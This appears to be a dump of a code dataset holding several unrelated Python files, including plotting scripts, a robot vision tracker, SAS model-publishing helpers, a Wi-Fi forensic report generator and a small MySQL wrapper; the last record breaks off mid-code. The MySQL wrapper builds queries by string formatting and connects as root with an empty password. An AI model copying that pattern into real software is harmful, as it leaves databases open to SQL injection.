width=200)\n# pn.Row(plot_ecdf_pn, widgets)\n \n p2 = plot_beta_ratios_ecdf()\n bokeh.io.show(p2)\n \n bokeh.io.save(\n p2,\n filename=\"viz_explore_two_arrival_story_Fig2a.html\",\n title=\"Exploring two arrival story\",\n )\n \n p3 = plot_brentq_roots()\n bokeh.io.show(p3)\n \n bokeh.io.save(\n p3,\n filename=\"viz_explore_two_arrival_story_Fig2b.html\",\n title=\"Exploring two arrival story\",\n )\n \n plots = [p2, p3]\n bokeh.io.save(\n plots,\n filename=\"viz_explore_two_arrival_story_Fig2.html\",\n title=\"Exploring two arrival story\",\n )\n \n \n return True\n\nif __name__ == '__main__' : main()\n\n# +\n#!jupytext --to python viz_explore_two_arrival_story.ipynb\n# -\n\n\n","sub_path":"microtubulepkg/microtubulepkg/viz_explore_two_arrival_story.py","file_name":"viz_explore_two_arrival_story.py","file_ext":"py","file_size_in_byte":7307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"581282139","text":"#!/usr/bin/python3.7\n# -*- coding: utf-8 -*-\n# @Time : 2019/4/22 11:41\n# @Author: Jtyoui@qq.com\nimport zipfile\nfrom os import path\n\nfile_zip_path = path.dirname(path.abspath(__file__))\nsep = path.sep\n\n\ndef load_zip(zip_name, file_name, encoding='UTF-8', sep='\\n'):\n \"\"\"加载zip数据\n\n :param zip_name: 压缩包的名字\n :param file_name: 压缩包里面文件的名字\n :param encoding: 文件的编码\n :param sep: 压缩文件里面的换行符\n :return: 压缩包里面的数据:默认编码的UTF-8\n \"\"\"\n file_zip = path.join(file_zip_path, zip_name)\n f = zipfile.ZipFile(file_zip)\n fp = f.read(file_name)\n lines = fp.decode(encoding).split(sep)\n return lines\n\n\nif __name__ == '__main__':\n line = load_zip('train.zip', 'train.txt')\n for l in line:\n print(l)\n\n# 关于文件压缩包目录\n# py.zip是汉语拼音\n# train.zip是中国火车站名字压缩包\n# city.zip是中国天气预报城市与编码\n","sub_path":"jtyoui/file_zip/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"25747186","text":"'''\nGiven a string of words ( known as Sentence ),reverse all the words.\n\nExample\nreverse('name is vishal kumar')\nReturns: 'kumar vishal is name'\n'''\n\n#using soting\ndef reverse(sentence):\n\t''' \n\tFuntion to reverse all the words in given sentence\n\tSyntax: reverse(sentence)\n\tTime Complexity: O(nlogn) \t\n\t'''\n\t#1st spliting the sentence into word list i.e. ['name', 'is', 'vishal', 'kumar']\n\t#then sort the word list in reverse order i.e. ['kumar', 'vishal', 'is', 'name']\n\t#joining the revresed list back into string\n\treturn ' '.join(sentence.split()[::-1]) \n\n\n#using Parsing\ndef reverse(sentence):\t\t\n\t''' \n\tFuntion to reverse all the words in given sentence\n\tSyntax: reverse(sentence)\n\tTime Complexity: O(n) \t\n\t'''\n\ti=len(sentence)-1\n\treverse_word_list=[] #contains the reversed sentence\n\tword_length=0\n\tword=''\n\t\n\t#parsing the string from last\n\twhile i >=0 :\n\n\t\tif sentence[i]==' ':\n\t\t\t#if space is encountered and word_length is not zero 0\n\t\t\t#means a new word is formed \n\t\t\tif word_length!=0:\n\t\t\t\treverse_word_list.append(word)\n\t\t\t\tword=''\n\t\t\t\tword_length=0\t\t\n\t\telse:\n\t\t\t#if i is some regular letter in the word of the sentence\n\t\t\t#then concatinate the letter with current word\n\t\t\tword=sentence[i]+word\n\t\t\tword_length+=1 #increment the word_length\n\t\t\n\t\ti-=1\t#dicrement the loop-counter\n\n\t#for accomaodation of 1st letter of the sentence\t\n\tif word_length!=0:\n\t\treverse_word_list.append(word)\t\n\n\treturn ' '.join(reverse_word_list) #joining the revresed word list back into string\n\n\n\n\t\t\nsentence='name is vishal kumar'\noutput=reverse(sentence)\nprint(output)","sub_path":"Arrays & Strings/Sentence Reversal.py","file_name":"Sentence Reversal.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"169301357","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom models import Widget\nfrom grouping import create_group, add2group\nfrom tinymce import models as tinymce_model\n\n#\n# Text\n#\n\ncreate_group('text', 'Текст')\n\n@add2group('Параграф', 'text')\nclass SimpleText(Widget):\n\n TEXT_TYPE_CHOICES = (\n (1, 'Анонс'),\n (2, 'Цитата'),\n (3, 'Заметки'),\n )\n\n text = models.TextField(\"Текст\", default=\"Text\")\n text_type = models.PositiveIntegerField(\"Тип текстового блока\", choices=TEXT_TYPE_CHOICES, default=1)\n\n@add2group('Таблица характеристик', 'text')\nclass CharsTable(Widget): \n text = models.TextField(\"Текст\", default=\"Свойство 1 :: Значение 1\\nСвойство 2 :: Значение 2\\nСвойство 3 :: Значение 3\")\n\n def get_pairs(self):\n result = []\n lines = self.text.split(\"\\n\")\n for line in lines:\n try:\n kv = line.split(\"::\")\n result.append({ 'key': kv[0].strip(), 'value': kv[1].strip() })\n except:\n pass\n return result\n","sub_path":"pim/trunk/widgets/set_text.py","file_name":"set_text.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"21764950","text":"import cv2\nimport numpy as np\nimport time\nfrom networktables import NetworkTables as nt\n\n\nframeScalingFactor = 0.3\n\n# PARAMS\nLBOUND_ORANGE = np.array([0, 100, 200])\nUBOUND_ORANGE = np.array([50, 255, 255])\n\nLBOUND_BRIGHT = np.array([0, 0, 250])\nUBOUND_BRIGHT = np.array([60, 100, 255])\n\nLBOUND_WHITE_BGR = np.array([254, 254, 254])\nUBOUND_WHITE_BGR = np.array([255, 255, 255])\n# END PARAMS\n\nprint(\"OpenCV version: \" + cv2.__version__)\n\ndef kernel(bgr):\n bgr = cv2.blur(bgr, (7, 7))\n hsv = cv2.cvtColor(bgr, cv2.COLOR_BGR2HSV)\n\n mask_white = cv2.inRange(bgr, LBOUND_WHITE_BGR,UBOUND_WHITE_BGR)\n mask_bright = cv2.inRange(hsv, LBOUND_BRIGHT, UBOUND_BRIGHT)\n mask_orange = cv2.inRange(hsv, LBOUND_ORANGE, UBOUND_ORANGE)\n mask = cv2.bitwise_or(mask_orange, mask_bright)\n mask = cv2.bitwise_and(cv2.bitwise_not(mask_white),mask)\n mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, (31, 31), iterations=2)\n\n return mask\n\ncap = cv2.VideoCapture(1)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, cap.get(cv2.CAP_PROP_FRAME_WIDTH) * frameScalingFactor)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, cap.get(cv2.CAP_PROP_FRAME_HEIGHT) * frameScalingFactor)\n\nnt.initialize(server=\"roborio-6731-frc.local\")\nsd = nt.getTable(\"SmartDashboard\")\n\nwhile 1:\n ### MAIN LOOP\n\n r, bgr = cap.read()\n h = bgr.shape[0]\n hw = bgr.shape[1] * 0.5\n \n if r:\n start = time.time()\n\n mask = kernel(bgr)\n\n end = time.time()\n\n ### END MAIN LOOP\n\n cv2.imshow(\"masked\", mask)\n\n try:\n M = cv2.moments(mask)\n x = (M[\"m10\"] / M[\"m00\"] - hw) / hw\n y = (M[\"m01\"] / M[\"m00\"]) / h\n \n print(\"x: \" + str(x) + \" y: \" + str(y))\n sd.putNumber(\"ball_x|PI_2\", x)\n sd.putNumber(\"ball_y|PI_2\", y)\n except:\n sd.putNumber(\"ball_x|PI_2\", -2)\n sd.putNumber(\"ball_y|PI_2\", -2)\n\n\n \n bound1 = LBOUND_ORANGE\n bound2 = UBOUND_ORANGE\n\n c = cv2.waitKey(1) & 0xFF\n\n keys1 = [ord(ki) for ki in \"rftgyh\"]\n keys2 = [ord(ki) for ki in \"ujikol\"]\n for k1 in range(len(keys1)):\n if c == keys1[k1]:\n dirrection = 1 if (k1 % 2)==0 else -1\n which = k1 // 2\n bound1[which] += dirrection\n for k2 in range(len(keys2)):\n if c == keys2[k2]:\n dirrection = 1 if (k2 % 2)==0 else -1\n which = k2 // 2\n bound2[which] += dirrection\n\n if c == ord('q'):\n break\n\n #print(str(bound1) +' '+ str(bound2))\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"340181869","text":"#!/usr/bin/env python\n# encoding: utf-8\n#\n# Copyright © 2019, SAS Institute Inc., Cary, NC, USA. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\n\"\"\"Commonly used tasks in the analytics life cycle.\"\"\"\n\nimport json\nimport logging\nimport pickle\nimport re\nimport sys\nimport warnings\n\nfrom . import utils\nfrom .core import RestObj, get, get_link, request_link\nfrom .services import model_management as mm\nfrom .services import model_publish as mp\nfrom .services import model_repository as mr\nfrom .utils.pymas import PyMAS, from_pickle\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _sklearn_to_dict(model):\n # As of Viya 3.4 model registration fails if character fields are longer\n # than 1024 characters\n DESC_MAXLEN = 1024\n\n # As of Viya 3.4 model registration fails if user-defined properties are\n # longer than 512 characters.\n PROP_MAXLEN = 512\n\n # Convert Scikit-learn values to built-in Model Manager values\n mappings = {'LogisticRegression': 'Logistic regression',\n 'LinearRegression': 'Linear regression',\n 'SVC': 'Support vector machine',\n 'GradientBoostingClassifier': 'Gradient boosting',\n 'XGBClassifier': 'Gradient boosting',\n 'XGBRegressor': 'Gradient boosting',\n 'RandomForestClassifier': 'Forest',\n 'DecisionTreeClassifier': 'Decision tree',\n 'DecisionTreeRegressor': 'Decision tree',\n 'classifier': 'Classification',\n 'regressor': 'Prediction'}\n\n if hasattr(model, '_final_estimator'):\n estimator = type(model._final_estimator)\n else:\n estimator = type(model)\n\n # Can tell if multi-class .multi_class\n result = dict(\n description=str(model)[:DESC_MAXLEN],\n algorithm=mappings.get(estimator.__name__, estimator.__name__),\n scoreCodeType='ds2MultiType',\n trainCodeType='Python',\n function=mappings.get(model._estimator_type, model._estimator_type),\n tool='Python %s.%s'\n % (sys.version_info.major, sys.version_info.minor),\n properties=[{'name': str(k)[:PROP_MAXLEN],\n 'value': str(v)[:PROP_MAXLEN]}\n for k, v in model.get_params().items()]\n )\n\n return result\n\n\ndef register_model(model, name, project, repository=None, input=None,\n version=None, files=None, force=False):\n \"\"\"Register a model in the model repository.\n\n Parameters\n ----------\n model : swat.CASTable or sklearn.BaseEstimator\n The model to register. If an instance of ``swat.CASTable`` the table\n is assumed to hold an ASTORE, which will be downloaded and used to\n construct the model to register. If a scikit-learn estimator, the\n model will be pickled and uploaded to the registry and score code will\n be generated for publishing the model to MAS.\n name : str\n Designated name for the model in the repository.\n project : str or dict\n The name or id of the project, or a dictionary representation of\n the project.\n repository : str or dict, optional\n The name or id of the repository, or a dictionary representation of\n the repository. If omitted, the default repository will be used.\n input : DataFrame, type, list of type, or dict of str: type, optional\n The expected type for each input value of the target function.\n Can be omitted if target function includes type hints. If a DataFrame\n is provided, the columns will be inspected to determine type information.\n If a single type is provided, all columns will be assumed to be that type,\n otherwise a list of column types or a dictionary of column_name: type\n may be provided.\n version : {'new', 'latest', int}, optional\n Version number of the project in which the model should be created.\n Defaults to 'new'.\n files : list\n force : bool, optional\n Create dependencies such as projects and repositories if they do not\n already exist.\n\n Returns\n -------\n model : RestObj\n The newly registered model as an instance of ``RestObj``\n\n Notes\n -----\n If the specified model is a CAS table the model data and metadata will be\n written to a temporary zip file and then imported using\n model_repository.import_model_from_zip.\n\n If the specified model is from the Scikit-Learn package, the model will be\n created using model_repository.create_model and any additional files will\n be uploaded as content.\n\n \"\"\"\n # TODO: Create new version if model already exists\n # TODO: Allow file info to be specified\n # TODO: Performance stats\n\n # If version not specified, default to creating a new version\n version = version or 'new'\n\n # If replacing an existing version, make sure the model version exists\n if str(version).lower() != 'new':\n model_obj = mr.get_model(name)\n if model_obj is None:\n raise ValueError(\"Unable to update version '%s' of model '%s%. \"\n \"Model not found.\" % (version, name))\n model_versions = request_link(model_obj, 'modelVersions')\n assert isinstance(model_versions, list)\n\n # Use 'new' to create a new version if one doesn't exist yet.\n if len(model_versions) == 0:\n raise ValueError(\"No existing version of model '%s' to update.\"\n % name)\n\n # Help function for extracting version number of REST response\n def get_version(x):\n return float(x.get('modelVersionName', 0))\n\n if str(version).isnumeric():\n match = [x for x in model_versions if float(version) ==\n get_version(x)]\n assert len(match) <= 1\n\n match = match[0] if len(match) else None\n elif str(version).lower() == 'latest':\n # Sort by version number and get first\n match = sorted(model_versions, key=get_version)[0]\n else:\n raise ValueError(\"Unrecognized version '%s'.\" % version)\n\n #\n\n # TODO: get ID of correct model version\n # if version != new, get existing model\n # get model (modelVersions) rel\n # -> returns list w/ id, modelVersionName, etc\n\n files = files or []\n\n # Find the project if it already exists\n p = mr.get_project(project) if project is not None else None\n\n # Do we need to create the project first?\n create_project = True if p is None and force else False\n\n if p is None and not create_project:\n raise ValueError(\"Project '{}' not found\".format(project))\n\n # Use default repository if not specified\n if repository is None:\n repository = mr.default_repository()\n else:\n repository = mr.get_repository(repository)\n\n # Unable to find or create the repo.\n if repository is None:\n raise ValueError(\"Unable to find repository '{}'\".format(repository))\n\n # If model is a CASTable then assume it holds an ASTORE model.\n # Import these via a ZIP file.\n if 'swat.cas.table.CASTable' in str(type(model)):\n zipfile = utils.create_package(model)\n\n if create_project:\n project = mr.create_project(project, repository)\n\n model = mr.import_model_from_zip(name, project, zipfile,\n version=version)\n return model\n\n # If the model is an scikit-learn model, generate the model dictionary\n # from it and pickle the model for storage\n elif all(hasattr(model, attr) for attr\n in ['_estimator_type', 'get_params']):\n # Pickle the model so we can store it\n model_pkl = pickle.dumps(model)\n files.append({'name': 'model.pkl',\n 'file': model_pkl,\n 'role': 'Python Pickle'})\n\n # Extract model properties\n model = _sklearn_to_dict(model)\n model['name'] = name\n\n # Generate PyMAS wrapper\n try:\n mas_module = from_pickle(model_pkl, 'predict',\n input_types=input, array_input=True)\n assert isinstance(mas_module, PyMAS)\n\n # Include score code files from ESP and MAS\n files.append({'name': 'dmcas_packagescorecode.sas',\n 'file': mas_module.score_code(),\n 'role': 'Score Code'})\n files.append({'name': 'dmcas_epscorecode.sas',\n 'file': mas_module.score_code(dest='CAS'),\n 'role': 'score'})\n\n model['inputVariables'] = [var.as_model_metadata()\n for var in mas_module.variables\n if not var.out]\n\n model['outputVariables'] = \\\n [var.as_model_metadata() for var in mas_module.variables\n if var.out and var.name not in ('rc', 'msg')]\n except ValueError:\n # PyMAS creation failed, most likely because input data wasn't\n # provided\n logger.exception('Unable to inspect model %s', model)\n\n warnings.warn('Unable to determine input/output variables. '\n ' Model variables will not be specified and some '\n 'model functionality may not be available.')\n else:\n # Otherwise, the model better be a dictionary of metadata\n assert isinstance(model, dict)\n\n if create_project:\n vars = model.get('inputVariables', [])[:]\n vars += model.get('outputVariables', [])\n\n if model.get('function') == 'Regression':\n target_level = 'Interval'\n else:\n target_level = None\n\n project = mr.create_project(project, repository,\n variables=vars,\n targetLevel=target_level)\n\n model = mr.create_model(model, project)\n\n assert isinstance(model, RestObj)\n\n # Upload any additional files\n for file in files:\n if isinstance(file, dict):\n mr.add_model_content(model, **file)\n else:\n mr.add_model_content(model, file)\n\n return model\n\n\ndef publish_model(model,\n destination,\n code=None,\n max_retries=60,\n replace=False, **kwargs):\n \"\"\"Publish a model to a configured publishing destination.\n\n Parameters\n ----------\n model : str or dict\n The name or id of the model, or a dictionary representation of\n the model.\n destination : str\n code : optional\n max_retries : int, optional\n replace : bool, optional\n Whether to overwrite the model if it already exists in\n the `destination`\n kwargs : optional\n additional arguments will be passed to the underlying publish\n functions.\n\n Returns\n -------\n RestObj\n The published model\n\n Notes\n -----\n If no code is specified, the model is assumed to be already registered in\n the model repository and Model Manager's publishing functionality will be\n used.\n\n Otherwise, the model publishing API will be used.\n\n See Also\n --------\n :meth:`model_management.publish_model <.ModelManagement.publish_model>`\n :meth:`model_publish.publish_model <.ModelPublish.publish_model>`\n\n\n .. versionchanged:: 1.1.0\n Added `replace` option.\n\n \"\"\"\n def submit_request():\n # Submit a publishing request\n if code is None:\n dest_obj = mp.get_destination(destination)\n\n if dest_obj and dest_obj.destinationType == \"cas\":\n publish_req = mm.publish_model(model, destination,\n force=replace,\n reload_model_table=True)\n else:\n publish_req = mm.publish_model(model, destination,\n force=replace)\n else:\n publish_req = mp.publish_model(model, destination,\n code=code, **kwargs)\n\n # A successfully submitted request doesn't mean a successfully\n # published model. Response for publish request includes link to\n # check publish log\n job = mr._monitor_job(publish_req, max_retries=max_retries)\n return job\n\n # Submit and wait for status\n job = submit_request()\n\n # If model was successfully published and it isn't a MAS module, we're done\n if job.state.lower() == 'completed' \\\n and job.destination.destinationType != 'microAnalyticService':\n return request_link(job,'self')\n\n # If MAS publish failed and replace=True, attempt to delete the module\n # and republish\n if job.state.lower() == 'failed' and replace and \\\n job.destination.destinationType == 'microAnalyticService':\n from .services import microanalytic_score as mas\n mas.delete_module(job.publishName)\n\n # Resubmit the request\n job = submit_request()\n\n # Raise exception if still failing\n if job.state.lower() == 'failed':\n log = request_link(job, 'publishingLog')\n raise RuntimeError(\"Failed to publish model '%s': %s\"\n % (model, log.log))\n\n # Raise exception if unknown status received\n elif job.state.lower() != 'completed':\n raise RuntimeError(\"Model publishing job in an unknown state: '%s'\"\n % job.state.lower())\n\n log = request_link(job, 'publishingLog')\n msg = log.get('log').lstrip('SUCCESS===')\n\n # As of Viya 3.4 MAS converts module names to lower case.\n # Since we can't rely on the request module name being preserved, try to\n # parse the URL out of the response so we can retrieve the created module.\n try:\n details = json.loads(msg)\n\n module_url = get_link(details, 'module')\n module_url = module_url.get('href')\n except json.JSONDecodeError:\n match = re.search(r'(?:rel=module, href=(.*?),)', msg)\n module_url = match.group(1) if match else None\n\n if module_url is None:\n raise Exception('Unable to retrieve module URL from publish log.')\n\n module = get(module_url)\n\n if 'application/vnd.sas.microanalytic.module' in module._headers[\n 'content-type']:\n # Bind Python methods to the module instance that will execute the\n # corresponding MAS module step.\n from sasctl.services import microanalytic_score as mas\n return mas.define_steps(module)\n return module\n","sub_path":"src/sasctl/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":14618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"222713431","text":"import pymysql\r\n\r\nclass MysqL:\r\n conn = pymysql.connect(host='localhost', port=3306, user='root', passwd='', db='fuwo6', charset='UTF8')\r\n def select(self,name,conter):\r\n cur = self.conn.cursor()\r\n cur.execute(\"select id from weibo where NAME ='%s' and conter='%s'\"%(name,conter))\r\n r = cur.fetchone()\r\n cur.close\r\n return r\r\n\r\n def insert(self,**kwargs):\r\n sql = 'insert into weibo (name,time,conter,weight2,weight1,praise)' \\\r\n 'VALUE (\"%(name)s\",\"%(time)s\",\"%(conter)s\",%(weight2)s,%(weight1)s,%(praise)s)'%(kwargs)\r\n try:\r\n sl = self.select(kwargs['name'],kwargs['conter'])\r\n cur = self.conn.cursor()\r\n if type(None)!=type(sl):\r\n return False\r\n cur.execute(sql)\r\n self.conn.commit()\r\n return True\r\n except pymysql.Error as e:\r\n print(\"Error %d: %s\" % (e.args[0], e.args[1]))\r\n print(sql)\r\n cur.close\r\n return False\r\n\r\n def close(self):\r\n return self.conn.close\r\n\r\n# print (MysqL().insert(name='test',time='test',other='test',conter='test'))","sub_path":"Cdb.py","file_name":"Cdb.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"597747882","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[5]:\n\n\nimport pandas as pd\nimport os\nimport numpy\nimport MySQLdb\nimport omdtfn as odt\n\n#conn= MySQLdb.connect(\"localhost\",\"root\",\"admin\",\"omdb\")\n#df_mysql = pd.read_sql(\"select * from sitedb\",conn)\nomdb = os.getcwd() + \"\\\\\" + \"OMDB.csv\"\npntxt = os.getcwd() + \"\\\\\" + \"Periodic_Notification.txt\"\npth = os.getcwd() + \"\\\\\" + \"WRT1.csv\"\npth2 = os.getcwd() + \"\\\\\" + \"WRT2.csv\"\n\n#lambda : if ( if else )\nTS = lambda x : '2G' if ('2G SITE DOWN' in x) else ('3G' if ('3G SITE DOWN' in x) else ('4G' if ('4G SITE DOWN' in x) else ('MF' if ('MAIN' in x) else ('DC' if ('VOLTAGE' in x) else ('TM' if ('TEMPERATURE' in x) else ('SM' if ('SMOKE' in x) else ('GN' if ('GEN' in x) else ('GN' if ('GENSET' in x) else ('TH' if ('THEFT' in x) else ('2_CELL' if ('2G CELL DOWN' in x) else ('3_CELL' if ('3G CELL DOWN' in x) else ('4_CELL' if ('4G CELL DOWN' in x) else \"NA\"))))))))))))\n\ndef write2txt(flname,txt):\n fo = open(flname,\"w+\")\n txt = fo.write(txt)\n fo.close()\n\nclass omdf:\n def __init__(self,dic):\n self.df = pd.DataFrame(dic)\n self.arr = self.df.to_numpy()\n def df_addcol_lamda(self):\n self.df['cat'] = self.df.apply(lambda row: TS(row.Summary), axis = 1)\n return self.df.to_dict()\n def df_addcol_fdic(self,d,newcolname):\n self.df[newcolname] = self.df['scode'].map(d)\n return self.df.to_dict()\n def df_apply_on_col(self,newcolname):\n self.df[newcolname] = self.df.apply(lambda x : x.CustomAttr15[0:5], axis = 1)\n return self.df.to_dict()\n def df_remove_col_by_list(self,lis):\n ndf = self.df[lis]\n return ndf.to_dict()\n\n\ncols = [\"SERIAL\",\"EQUIPMENTKEY\",\"CUSTOMATTR15\",\"SUMMARY\",\"LASTOCCURRENCE\",\"CLEARTIMESTAMP\",\"ALARMDETAILS\",\"CUSTOMATTR15\"]\nsingle = os.getcwd() + \"\\\\\" + \"DWRRU.csv\"\ndf = pd.read_csv(single)\ndf2 = df[cols]\nprint(df2['CUSTOMATTR15'].value_counts())\nprint(df2)\n#df3 = df2.replace(np.nan,0)\n#print(df2)\n\n\n\n#codelist = [df['CUSTOMATTR15'].to_list()]\n#print(codelist)\n\n\n\n#Codelist = df2['CUSTOMATTR15']\n\n\n#df2['cnt'] = df2['CUSTOMATTR15'].value_counts()\n#print(df2)\n\n\n#df2['cnt'] = lambda x : x.df2['CUSTOMATTR15'].value_counts()\n#df['count'] = df['CUSTOMATTR15'].value_counts()\n#print(df)\n#print(df2)\n\n#print(fdf['CUSTOMATTR15'].value_counts())\n#df3 = df2.apply(lambda s: s['CUSTOMATTR15'], axis=1)\n#df4 = df['CUSTOMATTR15'].value_counts().loc[lambda x : ]\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Z_ALL_FILE/Jy1/fndf_rru.py","file_name":"fndf_rru.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"316959813","text":"__author__ = 'root'\n# -*- coding: utf-8 -*-\n\"\"\"from reportlab.pdfgen import canvas\nfrom reportlab.lib.units import inch, cm\nc = canvas.Canvas('ex1.pdf')\n#self.report.drawImage('zaza.jpg', 0, 0, 10*cm, 10*cm)\nself.report.drawString(100, 300, \"Je suis zaza, the girl with the most beautiful natural duck face there is\")\nself.report.showPage()\nself.report.save()\n\"\"\"\n\n\nfrom xhtml2pdf import pisa # import python module\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\"\"\"\nself.report += 5,\"Hashé SHA256 du fichier : \")\nself.report += 4,\"Date de création du fichier : \")\nself.report += 3,\"Taille du fichier analysé : \")\n\"\"\"\n\n\n\nclass Preview(object):\n def __init__(self, filename, size, startDate, endDate, ESSID, BSSID, packetsNumber, channel, signal\n , nodesNumber, duration, uptime):\n\n self.filename = filename\n self.size = size\n self.startDate = startDate\n self.endDate = endDate\n self.ESSID = ESSID\n self.BSSID = BSSID\n self.packetsNumber = packetsNumber\n self.channel = channel\n self.signal = signal\n self.nodesNumber = nodesNumber\n self.duration = duration\n self.uptime =uptime\n\n\n\nclass Report(object):\n\n def __init__(self, detectiveName, investigationDate, attack, preview, nodes, path):\n self.filename = path+\"report_\"+preview.ESSID+\"_\"+investigationDate+\".pdf\"\n self.preview = preview\n self.detectiveName = detectiveName\n self.investigationDate = investigationDate\n self.attack = attack\n self.nodes = nodes\n with open(\"stats.csv\") as f:\n content = f.readlines()\n self.mgtPackets = [int(x) for x in content[1].split(',')]\n self.allPackets = [int(x) for x in content[0].split(',')]\n del self.mgtPackets[6]\n del self.mgtPackets[6]\n\n\n\n self.report = \"\"\"\"\n\n\n\n\n\n\n\n\n \n \"\"\"\n imagePath = os.path.abspath(\"Parser/Parsed/file\"+self.preview.ESSID+\".png\")\n self.report += \"

Nom de l'investigateur : {0}
\".format(self.detectiveName)\n self.report += \"Date de l'investigation : {0}
\".format(self.investigationDate)\n self.report += \"Nom du fichier analysé : {0}
\".format(self.preview.filename)\n self.report += \"ESSID du réseau analysé : {0}
\".format(self.preview.ESSID)\n self.report += \"BSSID du réseau analysé : {0}

\".format(self.preview.BSSID)\n self.report += \"

Après analyse du fichier {0}, effectué par l'investigateur {1}, \".format(self.preview.filename, self.detectiveName)\n self.report += \"le {0}. Dans le but de détecter une attaque de type {1} sur le réseau \".format( self.investigationDate, self.attack)\n self.report += \"de ESSID {0} et dont le BSSID est {1} .\".format(self.preview.ESSID, self.preview.BSSID)\n self.report += \"

L'outil a généré les resultats suivants :\"\n\n self.report += \"

Nombre de noeuds connectés au réseau : {0}\".format(self.preview.nodesNumber)\n self.report += \"
Nombre total de paquets : {0}

\".format(self.preview.packetsNumber)\n self.report += \"\"\"\n \n \"\"\"\n\n for node in self.nodes:\n\n\n self.report += \"\"\n self.makeGraphs()\n self.report += \"
Adresse MAC du noeudNombre de paquetsRésultat de l'analyse Fiabilité du résultat
\"+str(node[0])+\"\"+str(node[1])+\"\"+str(node[5])+\"\"+str(node[4])+\"
\"\n self.report += \"\"\"\n
\n
\n \n \n \n
\n \n
\n

Carte du réseau '\"\"\"+self.preview.ESSID+\"\"\"'

\n
\n\n\n
\n \n \n \n
\n \n
\n\n
\n\n\n
\n\n \n \n \n
\n \n
\n

Types des paquets

\n
\n\n
\n\n\n \"\"\"\n\n for node in self.nodes:\n if node[2] is not None:\n self.nodeGraphs(node)\n\n path_ = os.path.abspath(\"Parser/Parsed/seq\"+node[0][:-2]+\".png\")\n path1 = os.path.abspath(\"Parser/Parsed/sign\"+node[0][:-2]+\".png\")\n\n self.report += \"\"\"\n
\n \n
\n\n

Cette page contient des informations supplémentaires sur le noeud '\"\"\"+node[0]+\"\"\"\"'
\n Nombre de paquets de donnée envoyés par ce noeud : \"\"\"+str(node[1])+\"\"\"\n\n
\n \n \n \n
\n \n
\"\"\"\n\n self.report += \"\"\"

Graphe représentant les écarts des numéro de sequences

\n
\"\"\"\n\n\n self.report += \"\"\"
\n \n \n \n
\n \n
\n

Graphe représentant la force de signal

\n
\n\n\n
\n\n\n\n
\n\n\n

\n\n\n \"\"\"\n\n\n\n\n self.report += \"\"\"\n
\n \n
\"\"\"+self.buildTable()+ \"\"\"\n\n\n \"\"\"\n\n\n\n\n self.convertHtmlToPdf(self.report, self.filename)\n\n def convertHtmlToPdf(self, sourceHtml, outputFilename):\n # open output file for writing (truncated binary)\n resultFile = open(outputFilename, \"w+b\")\n\n # convert HTML to PDF\n pisaStatus = pisa.CreatePDF(\n sourceHtml, # the HTML to convert\n dest=resultFile) # file handle to recieve result\n\n # close output file\n resultFile.close() # close output file\n\n # return True on success and False on errors\n return pisaStatus.err\n\n def nodeGraphs(self, node):\n plt.clf()\n Xs = [i for i in range(0,len(node[3]))]\n plt.figure(3)\n plt.title(node[0])\n plt.scatter(Xs, node[2], s=1, facecolor='0.5', lw = 0)\n plt.savefig(\"Parser/Parsed/seq\"+node[0][:-2]+\".png\", dpi=300)\n plt.clf()\n plt.figure(2)\n plt.title(node[0])\n plt.scatter(Xs, node[3], s=1, facecolor='0.5', lw = 0)\n plt.savefig(\"Parser/Parsed/sign\"+node[0][:-2]+\".png\", dpi=300)\n plt.clf()\n\n def makeGraphs(self):\n\n n_groups = 11\n fig, ax = plt.subplots(figsize=(15, 6), dpi=80)\n\n index = np.arange(n_groups)\n bar_width = 0.6\n\n opacity = 0.4\n error_config = {'ecolor': '0.3'}\n\n colors = ['yellowgreen', 'gold', 'lightskyblue', 'cyan', 'black' ,'green', 'blue', 'red', 'yellow', 'magenta', 'white' ]\n\n rects1 = plt.bar(index, self.mgtPackets, bar_width,\n alpha=opacity,\n color=colors,\n error_kw=error_config,\n )\n\n plt.xlabel('Sous-types', fontsize=24)\n plt.ylabel('Nombre de paquets', fontsize=24)\n plt.title('Distribution des paquets de types gestion', fontsize=26)\n plt.xticks(index + bar_width/2, ('0', '1', '2', '3', '4','5', '6', '7', '8', '9','10'))\n max_height = max(self.mgtPackets)\n plt.plot([-0.2,4],[ max_height*1.2, max_height*1.2],clip_on=False,color='white')\n for (x, bar) in zip(self.mgtPackets, rects1):\n ax.text(bar.get_x()+bar_width/2.,x*1.05 , x,\n ha='center', va='bottom', color='black')\n plt.savefig(\"Parser/Parsed/bars.png\")\n\n\n fig, ax = plt.subplots(figsize=(8, 6), dpi=80)\n # The slices will be ordered and plotted counter-clockwise.\n labels = \"Gestion\", \"Controle\", \"Donnees\"\n sizes = self.allPackets\n colors = ['yellowgreen', 'gold', 'lightskyblue']\n explode = (0.1, 0.1, 0.1) # only \"explode\" the 2nd slice (i.e. 